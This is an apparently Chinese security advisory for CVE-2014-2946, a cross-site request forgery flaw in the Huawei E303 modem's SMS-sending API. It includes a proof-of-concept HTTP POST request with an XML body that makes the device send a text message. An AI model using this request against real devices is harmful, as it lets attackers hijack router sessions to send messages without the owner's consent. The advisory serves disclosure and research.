发布日期:2014-05-30
更新日期:2014-06-03
受影响系统:
Huawei E303
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 67747
CVE(CAN) ID: CVE-2014-2946
Huawei E303路由器是无线宽带调制解调器。
Huawei E303 Router(固件版本CH2E303SM)在/api/sms/send-sms URL的实现上存在跨站请求伪造攻击,远程攻击者通过XML文档内的请求元素,利用此漏洞可劫持管理员身份验证请求。
<*来源:Benjamin Daniel Mussler
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[Proof -of-concept HTTP POST request]:
POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer:
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225
<?xml version="1.0"
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03
16:00:00</Date></request>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Huawei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: